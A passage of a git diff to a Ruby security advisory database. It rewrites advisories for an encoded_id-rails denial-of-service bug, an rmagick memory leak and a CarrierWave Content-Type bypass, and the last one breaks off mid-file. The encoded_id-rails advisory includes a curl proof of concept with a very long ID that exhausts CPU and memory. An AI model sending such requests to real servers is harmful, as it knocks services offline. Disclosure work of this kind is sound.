aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
-    ```
-
-    This causes the application to spend a huge amount of time decoding
-    the ID and the allocation of > 200MB of objects.
-
-    ### Patches
-
-    Upgrade to `1.0.0.beta2`
-
-    This introduces a new option to limit the length of IDs that can
-    be decoded. A future release will also improve the performance and
-    hugely reduce allocations in the underlying hashids implementation.
-
-    ### References
-    _Are there any links users can visit to find out more?_
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.0.0.beta2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-0241
-    - https://github.com/stevegeek/encoded_id-rails/releases/tag/1.0.0.beta2
-    - https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c
-    - https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91
-    - https://github.com/advisories/GHSA-3px7-jm2p-6h2c
----
+---
+layout: advisory
+title: 'CVE-2024-0241 (encoded_id-rails): encoded_id-rails potential DOS vulnerability
+  due to URIs with extremely long encoded IDs'
+comments: false
+categories:
+- encoded_id-rails
+advisory:
+  gem: encoded_id-rails
+  cve: 2024-0241
+  ghsa: 3px7-jm2p-6h2c
+  url: https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c
+  title: encoded_id-rails potential DOS vulnerability due to URIs with extremely long
+    encoded IDs
+  date: 2023-10-24
+  description: |
+    ### Impact
+
+    The length of URIs and the various parts (eg path segments, query
+    parameters) is usually limited by the webserver processing the
+    incoming request. In the case of Puma the defaults are :
+
+    - path segment length: 8192
+    - Max URI length: 1024 * 12
+    - Max query length: 1024 * 10
+
+    See https://github.com/puma/puma/blob/master/docs/compile_options.md
+
+    If too long Puma raises:
+    > Puma caught this error: HTTP element REQUEST_PATH is longer than
+      the (8192) allowed length (was 12503) (Puma::HttpParserError)
+
+    However due to the performance of `hashids` extremely long encoded
+    IDs will consume a large amount of CPU and allocate a huge number
+    of intermediate objects.
+
+    For example:
+
+    ```
+    curl -vvv https://localhost.ssl:3000//dos?id=abcd-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+    ```
+
+    This causes the application to spend a huge amount of time decoding
+    the ID and the allocation of > 200MB of objects.
+
+    ### Patches
+
+    Upgrade to `1.0.0.beta2`
+
+    This introduces a new option to limit the length of IDs that can
+    be decoded. A future release will also improve the performance and
+    hugely reduce allocations in the underlying hashids implementation.
+
+    ### References
+    _Are there any links users can visit to find out more?_
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.0.0.beta2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0241
+    - https://github.com/stevegeek/encoded_id-rails/releases/tag/1.0.0.beta2
+    - https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c
+    - https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91
+    - https://github.com/advisories/GHSA-3px7-jm2p-6h2c
+---
diff --git a/advisories/_posts/2023-10-30-CVE-2023-5349.md b/advisories/_posts/2023-10-30-CVE-2023-5349.md
index 418fee6f..93247f05 100644
--- a/advisories/_posts/2023-10-30-CVE-2023-5349.md
+++ b/advisories/_posts/2023-10-30-CVE-2023-5349.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2023-5349 (rmagick): memory leak flaw was found in ruby-magick'
-comments: false
-categories:
-- rmagick
-advisory:
-  gem: rmagick
-  cve: 2023-5349
-  ghsa: frgf-8jr5-j2jv
-  url: https://github.com/advisories/GHSA-frgf-8jr5-j2jv
-  title: memory leak flaw was found in ruby-magick
-  date: 2023-10-30
-  description: |
-    A memory leak flaw was found in ruby-magick, an interface between
-    Ruby and ImageMagick. This issue can lead to a denial of service
-    (DOS) by memory exhaustion.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 5.3.0"
-  related:
-    ghsa:
-    - https://github.com/advisories/GHSA-j6x7-7g72-8ww2
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-5349
-    - https://github.com/rmagick/rmagick/issues/1401
-    - https://github.com/rmagick/rmagick/pull/1406
-    - https://github.com/rmagick/rmagick/commit/02f37ca0d6c2b8fff316e0668efa690f5c90a429
-    - https://github.com/rmagick/rmagick/commit/fec7a7e639ae565386f7615155dbcf49b957b64a
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2247064
-    - https://access.redhat.com/security/cve/CVE-2023-5349
-    - https://github.com/advisories/GHSA-frgf-8jr5-j2jv
----
+---
+layout: advisory
+title: 'CVE-2023-5349 (rmagick): memory leak flaw was found in ruby-magick'
+comments: false
+categories:
+- rmagick
+advisory:
+  gem: rmagick
+  cve: 2023-5349
+  ghsa: frgf-8jr5-j2jv
+  url: https://github.com/advisories/GHSA-frgf-8jr5-j2jv
+  title: memory leak flaw was found in ruby-magick
+  date: 2023-10-30
+  description: |
+    A memory leak flaw was found in ruby-magick, an interface between
+    Ruby and ImageMagick. This issue can lead to a denial of service
+    (DOS) by memory exhaustion.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 5.3.0"
+  related:
+    ghsa:
+    - https://github.com/advisories/GHSA-j6x7-7g72-8ww2
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5349
+    - https://github.com/rmagick/rmagick/issues/1401
+    - https://github.com/rmagick/rmagick/pull/1406
+    - https://github.com/rmagick/rmagick/commit/02f37ca0d6c2b8fff316e0668efa690f5c90a429
+    - https://github.com/rmagick/rmagick/commit/fec7a7e639ae565386f7615155dbcf49b957b64a
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2247064
+    - https://access.redhat.com/security/cve/CVE-2023-5349
+    - https://github.com/advisories/GHSA-frgf-8jr5-j2jv
+---
diff --git a/advisories/_posts/2023-11-29-CVE-2023-49090.md b/advisories/_posts/2023-11-29-CVE-2023-49090.md
index f66a79ae..108d56fb 100644
--- a/advisories/_posts/2023-11-29-CVE-2023-49090.md
+++ b/advisories/_posts/2023-11-29-CVE-2023-49090.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2023-49090 (carrierwave): CarrierWave Content-Type allowlist bypass vulnerability,
-  possibly leading to XSS'
-comments: false
-categories:
-- carrierwave
-advisory:
-  gem: carrierwave
-  cve: 2023-49090
-  ghsa: gxhx-g4fq-49hj
-  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-g4fq-49hj
-  title: CarrierWave Content-Type allowlist bypass vulnerability, possibly leading
-    to XSS
-  date: 2023-11-29
-  description: |
-    ###Impact
-    [CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb)
-    has a Content-Type allowlist bypass vulnerability, possibly leading to XSS.
-
-    The validation in `allowlisted_content_type?` determines Content-Type
-    permissions by performing a partial match.
-    If the `content_type` argument of `allowlisted_content_type?` is passed
-    a value crafted by the attacker, Content-Types not included in the
-    `content_type_allowlist` will be allowed.
-
-    In addition, by setting the Content-Type configured by the attacker
-    at the time of file delivery, it is possible to cause XSS on the
-    user's browser when the uploaded file is opened.
-
-    ### Patches
-    Upgrade to [3.0.5](https://rubygems.org/gems/carrierwave/versions/3.0.5)
-    or [2.2.5](https://rubygems.org/gems/carrierwave/versions/2.2.5).
-
-    ### Workarounds
-    When validating with `allowlisted_content_type?` in
-    [CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb),
-    forward match(`\\A`) the Content-Type set in `content_type_allowlist`,
-    preventing unintentional permission of `text/html;image/png` when
-    you want to allow only `image/png` in `content_type_allowlist`.
-
-    ### References
